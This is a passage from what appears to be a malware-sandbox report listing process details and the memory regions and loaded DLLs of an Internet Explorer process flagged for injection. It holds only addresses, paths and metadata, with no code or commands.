= "36" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x665e5000" os_pid = "0x1164" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x5d8" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:1496 CREDAT:82945 /prefetch:2" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2916 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2917 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2918 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2919 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2920 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2921 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2922 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2923 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2924 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2925 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2926 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 2927 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2928 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2929 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2930 start_va = 0x410000 end_va = 0x411fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2931 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2932 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2933 start_va = 0x530000 end_va = 0x5edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2934 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2935 start_va = 0x740000 end_va = 0x741fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2936 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 2937 start_va = 0x760000 end_va = 0x763fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2938 start_va = 0x770000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2939 start_va = 0x780000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 2940 start_va = 0x910000 end_va = 0xa90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 2941 start_va = 0xaa0000 end_va = 0xdd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2942 start_va = 0xde0000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 2943 start_va = 0xe00000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 2944 start_va = 0xe10000 end_va = 0xe10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 2945 start_va = 0xe20000 end_va = 0xe20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 2946 start_va = 0xe30000 end_va = 0xe30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 2947 start_va = 0xe40000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 2948 start_va = 0xe50000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 2949 start_va = 0xf50000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2950 start_va = 0x1050000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 2951 start_va = 0x1090000 end_va = 0x1090fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 2952 start_va = 0x10a0000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010a0000" filename = "" Region: id = 2953 start_va = 0x10b0000 end_va = 0x1179fff monitored = 0 entry_point = 0x10b3a40 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 2954 start_va = 0x1180000 end_va = 0x517ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 2955 start_va = 0x5180000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005180000" filename = "" Region: id = 2956 start_va = 0x6580000 end_va = 0x667ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006580000" filename = "" Region: id = 2957 start_va = 0x6680000 end_va = 0x668ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006680000" filename = "" Region: id = 2958 start_va = 0x6690000 end_va = 0x66cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006690000" filename = "" Region: id = 2959 start_va = 0x66d0000 end_va = 0x670ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066d0000" filename = "" Region: id = 2960 start_va = 0x6710000 end_va = 0x6710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006710000" filename = "" Region: id = 2961 start_va = 0x6720000 end_va = 0x672ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006720000" filename = "" Region: id = 2962 start_va = 0x6730000 end_va = 0x682ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006730000" filename = "" Region: id = 2963 start_va = 0x6830000 end_va = 0x692ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006830000" filename = "" Region: id = 2964 start_va = 0x6930000 end_va = 0x696ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006930000" filename = "" Region: id = 2965 start_va = 0x6970000 end_va = 0x6a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006970000" filename = "" Region: id = 2966 start_va = 0x6a70000 end_va = 0x6aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a70000" filename = "" Region: id = 2967 start_va = 0x6ab0000 end_va = 0x6caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ab0000" filename = "" Region: id = 2968 start_va = 0x6cb0000 end_va = 0x6d6bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006cb0000" filename = "" Region: id = 2969 start_va = 0x6d70000 end_va = 0x6d73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006d70000" filename = "" Region: id = 2970 start_va = 0x6d80000 end_va = 0x6d80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006d80000" filename = "" Region: id = 2971 start_va = 0x6d90000 end_va = 0x6d90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006d90000" filename = "" Region: id = 2972 start_va = 0x6da0000 end_va = 0x6ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006da0000" filename = "" Region: id = 2973 start_va = 0x6de0000 end_va = 0x6edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006de0000" filename = "" Region: id = 2974 start_va = 0x6ee0000 end_va = 0x6ee0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006ee0000" filename = "" Region: id = 2975 start_va = 0x6ef0000 end_va = 0x7077fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ieframe.dll.mui") Region: id = 2976 start_va = 0x7080000 end_va = 0x7080fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007080000" filename = "" Region: id = 2977 start_va = 0x7090000 end_va = 0x7090fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007090000" filename = "" Region: id = 2978 start_va = 0x70a0000 end_va = 0x711ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000070a0000" filename = "" Region: id = 2979 start_va = 0x7120000 end_va = 0x7120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007120000" filename = "" Region: id = 2980 start_va = 0x7130000 end_va = 0x7130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007130000" filename = "" Region: id = 2981 start_va = 0x7140000 end_va = 0x7140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007140000" filename = "" Region: id = 2982 start_va = 0x7150000 end_va = 0x7150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007150000" filename = "" Region: id = 2983 start_va = 0x7160000 end_va = 0x7163fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007160000" filename = "" Region: id = 2984 start_va = 0x7170000 end_va = 0x7176fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007170000" filename = "" Region: id = 2985 start_va = 0x7180000 end_va = 0x7181fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007180000" filename = "" Region: id = 2986 start_va = 0x7190000 end_va = 0x71cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007190000" filename = "" Region: id = 2987 start_va = 0x71d0000 end_va = 0x721ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071d0000" filename = "" Region: id = 2988 start_va = 0x7220000 end_va = 0x725ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007220000" filename = "" Region: id = 2989 start_va = 0x7260000 end_va = 0x735ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007260000" filename = "" Region: id = 2990 start_va = 0x7360000 end_va = 0x737ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007360000" filename = "" Region: id = 2991 start_va = 0x7380000 end_va = 0x73bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007380000" filename = "" Region: id = 2992 start_va = 0x73c0000 end_va = 0x740ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073c0000" filename = "" Region: id = 2993 start_va = 0x7410000 end_va = 0x742ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007410000" filename = "" Region: id = 2994 start_va = 0x7430000 end_va = 0x746ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007430000" filename = "" Region: id = 2995 start_va = 0x7470000 end_va = 0x756ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007470000" filename = "" Region: id = 2996 start_va = 0x7570000 end_va = 0x758ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007570000" filename = "" Region: id = 2997 start_va = 0x7590000 end_va = 0x75affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007590000" filename = "" Region: id = 2998 start_va = 0x75b0000 end_va = 0x75cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075b0000" filename = "" Region: id = 2999 start_va = 0x75d0000 end_va = 0x75d2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075d0000" filename = "" Region: id = 3000 start_va = 0x75e0000 end_va = 0x79dafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000075e0000" filename = "" Region: id = 3001 start_va = 0x79e0000 end_va = 0x79e2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000079e0000" filename = "" Region: id = 3002 start_va = 0x79f0000 end_va = 0x7a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079f0000" filename = "" Region: id = 3003 start_va = 0x7a30000 end_va = 0x7a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a30000" filename = "" Region: id = 3004 start_va = 0x7a70000 end_va = 0x7a70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007a70000" filename = "" Region: id = 3005 start_va = 0x7a80000 end_va = 0x7a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a80000" filename = "" Region: id = 3006 start_va = 0x7a90000 end_va = 0x7b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a90000" filename = "" Region: id = 3007 start_va = 0x7b90000 end_va = 0x7c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b90000" filename = "" Region: id = 3008 start_va = 0x7c90000 end_va = 0x7cbdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c90000" filename = "" Region: id = 3009 start_va = 0x7cc0000 end_va = 0x7cc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007cc0000" filename = "" Region: id = 3010 start_va = 0x7cd0000 end_va = 0x7cd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007cd0000" filename = "" Region: id = 3011 start_va = 0x7ce0000 end_va = 0x7d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ce0000" filename = "" Region: id = 3012 start_va = 0x7d20000 end_va = 0x7e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d20000" filename = "" Region: id = 3013 start_va = 0x7e20000 end_va = 0x7e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e20000" filename = "" Region: id = 3014 start_va = 0x7e60000 end_va = 0x7f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e60000" filename = "" Region: id = 3015 start_va = 0x7f60000 end_va = 0x7f60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f60000" filename = "" Region: id = 3016 start_va = 0x7f70000 end_va = 0x7faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f70000" filename = "" Region: id = 3017 start_va = 0x7fb0000 end_va = 0x80affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fb0000" filename = "" Region: id = 3018 start_va = 0x80b0000 end_va = 0x80b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080b0000" filename = "" Region: id = 3019 start_va = 0x80d0000 end_va = 0x80dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080d0000" filename = "" Region: id = 3020 start_va = 0x80e0000 end_va = 0x811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080e0000" filename = "" Region: id = 3021 start_va = 0x8120000 end_va = 0x831ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008120000" filename = "" Region: id = 3022 start_va = 0x8320000 end_va = 0x8321fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008320000" filename = "" Region: id = 3023 start_va = 0x8330000 end_va = 0x8332fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008330000" filename = "" Region: id = 3024 start_va = 0x8350000 end_va = 0x8350fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008350000" filename = "" Region: id = 3025 start_va = 0x8360000 end_va = 0x845ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008360000" filename = "" Region: id = 3026 start_va = 0x8460000 end_va = 0x849ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008460000" filename = "" Region: id = 3027 start_va = 0x8540000 end_va = 0x857ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008540000" filename = "" Region: id = 3028 start_va = 0x8580000 end_va = 0x877ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008580000" filename = "" Region: id = 3029 start_va = 0x8780000 end_va = 0x8780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008780000" filename = "" Region: id = 3030 start_va = 0x8790000 end_va = 0x8790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008790000" filename = "" Region: id = 3031 start_va = 0x87a0000 end_va = 0x87a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000087a0000" filename = "" Region: id = 3032 start_va = 0x87b0000 end_va = 0x87cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087b0000" filename = "" Region: id = 3033 start_va = 0x87d0000 end_va = 0x880ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 3034 start_va = 0x8810000 end_va = 0x885ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008810000" filename = "" Region: id = 3035 start_va = 0x8860000 end_va = 0x887ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008860000" filename = "" Region: id = 3036 start_va = 0x8880000 end_va = 0x88bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008880000" filename = "" Region: id = 3037 start_va = 0x88c0000 end_va = 0x89bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088c0000" filename = "" Region: id = 3038 start_va = 0x89c0000 end_va = 0x89dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089c0000" filename = "" Region: id = 3039 start_va = 0x89e0000 end_va = 0x89fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089e0000" filename = "" Region: id = 3040 start_va = 0x8a00000 end_va = 0x8a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a00000" filename = "" Region: id = 3041 start_va = 0x8a20000 end_va = 0x8a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a20000" filename = "" Region: id = 3042 start_va = 0x8a60000 end_va = 0x8b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a60000" filename = "" Region: id = 3043 start_va = 0x8b60000 end_va = 0x8b60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008b60000" filename = "" Region: id = 3044 start_va = 0x8b70000 end_va = 0x8b70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b70000" filename = "" Region: id = 3045 start_va = 0x8b80000 end_va = 0x8b80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b80000" filename = "" Region: id = 3046 start_va = 0x8b90000 end_va = 0x8bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b90000" filename = "" Region: id = 3047 start_va = 0x8bd0000 end_va = 0x8ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008bd0000" filename = "" Region: id = 3048 start_va = 0x8cd0000 end_va = 0x8ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cd0000" filename = "" Region: id = 3049 start_va = 0x8ed0000 end_va = 0x8ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ed0000" filename = "" Region: id = 3050 start_va = 0x8ee0000 end_va = 0x8ee3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ee0000" filename = "" Region: id = 3051 start_va = 0x8ef0000 end_va = 0x8feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ef0000" filename = "" Region: id = 3052 start_va = 0x8ff0000 end_va = 0x99b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008ff0000" filename = "" Region: id = 3053 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3054 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3055 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3056 start_va = 0x6cad0000 end_va = 0x6cafcfff monitored = 0 entry_point = 0x6cae2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 3057 start_va = 0x6cc30000 end_va = 0x6cc62fff monitored = 0 entry_point = 0x6cc40e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 3058 start_va = 0x6cc70000 end_va = 0x6cc79fff monitored = 0 entry_point = 0x6cc73200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3059 start_va = 0x6cc80000 end_va = 0x6ccb9fff monitored = 0 entry_point = 0x6cc99be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 3060 start_va = 0x6ccc0000 end_va = 0x6ced7fff monitored = 0 entry_point = 0x6cd697b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 3061 start_va = 0x6cee0000 end_va = 0x6cf4ffff monitored = 0 entry_point = 0x6cf19e70 region_type = mapped_file name = "directmanipulation.dll" filename = "\\Windows\\SysWOW64\\directmanipulation.dll" (normalized: "c:\\windows\\syswow64\\directmanipulation.dll") Region: id = 3062 start_va = 0x6cf50000 end_va = 0x6cf5dfff monitored = 0 entry_point = 0x6cf53f60 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\SysWOW64\\msimtf.dll" (normalized: "c:\\windows\\syswow64\\msimtf.dll") Region: id = 3063 start_va = 0x6cf60000 end_va = 0x6cfd9fff monitored = 0 entry_point = 0x6cf75770 region_type = mapped_file name = "ieui.dll" filename = "\\Windows\\SysWOW64\\ieui.dll" (normalized: "c:\\windows\\syswow64\\ieui.dll") Region: id = 3064 start_va = 0x6cfe0000 end_va = 0x6d367fff monitored = 1 entry_point = 0x6d18fd70 region_type = mapped_file name = "jscript9.dll" filename = "\\Windows\\SysWOW64\\jscript9.dll" (normalized: "c:\\windows\\syswow64\\jscript9.dll") Region: id = 3065 start_va = 0x6d370000 end_va = 0x6d3bcfff monitored = 0 entry_point = 0x6d3858f0 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\SysWOW64\\ninput.dll" (normalized: "c:\\windows\\syswow64\\ninput.dll") Region: id = 3066 start_va = 0x6d3c0000 end_va = 0x6d3dbfff monitored = 0 entry_point = 0x6d3d2a90 region_type = mapped_file name = "srpapi.dll" filename = "\\Windows\\SysWOW64\\srpapi.dll" (normalized: "c:\\windows\\syswow64\\srpapi.dll") Region: id = 3067 start_va = 0x6d3e0000 end_va = 0x6d486fff monitored = 0 entry_point = 0x6d416240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 3068 start_va = 0x6d490000 end_va = 0x6d4d0fff monitored = 0 entry_point = 0x6d497fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 3069 start_va = 0x6d4e0000 end_va = 0x6d6d0fff monitored = 0 entry_point = 0x6d5c3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 3070 start_va = 0x6d6e0000 end_va = 0x6db6dfff monitored = 0 entry_point = 0x6da6a320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 3071 start_va = 0x6db70000 end_va = 0x6dceafff monitored = 0 entry_point = 0x6dbbec50 region_type = mapped_file name = "ieapfltr.dll" filename = "\\Windows\\SysWOW64\\ieapfltr.dll" (normalized: "c:\\windows\\syswow64\\ieapfltr.dll") Region: id = 3072 start_va = 0x6dcf0000 end_va = 0x6dd3efff monitored = 0 entry_point = 0x6dd29000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\SysWOW64\\ieproxy.dll" (normalized: "c:\\windows\\syswow64\\ieproxy.dll") Region: id = 3073 start_va = 0x6dd40000 end_va = 0x6f0c1fff monitored = 0 entry_point = 0x6e120ec0 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll") Region: id = 3074 start_va = 0x6f0d0000 end_va = 0x6f0dafff monitored = 0 entry_point = 0x6f0d1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 3075 start_va = 0x6f0e0000 end_va = 0x6f134fff monitored = 0 entry_point = 0x6f103150 region_type = mapped_file name = "ieshims.dll" filename = "\\Program Files (x86)\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll") Region: id = 3076 start_va = 0x6f140000 end_va = 0x6f34efff monitored = 0 entry_point = 0x6f1eb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 3077 start_va = 0x6f350000 end_va = 0x6fee8fff monitored = 0 entry_point = 0x6f526970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 3078 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") 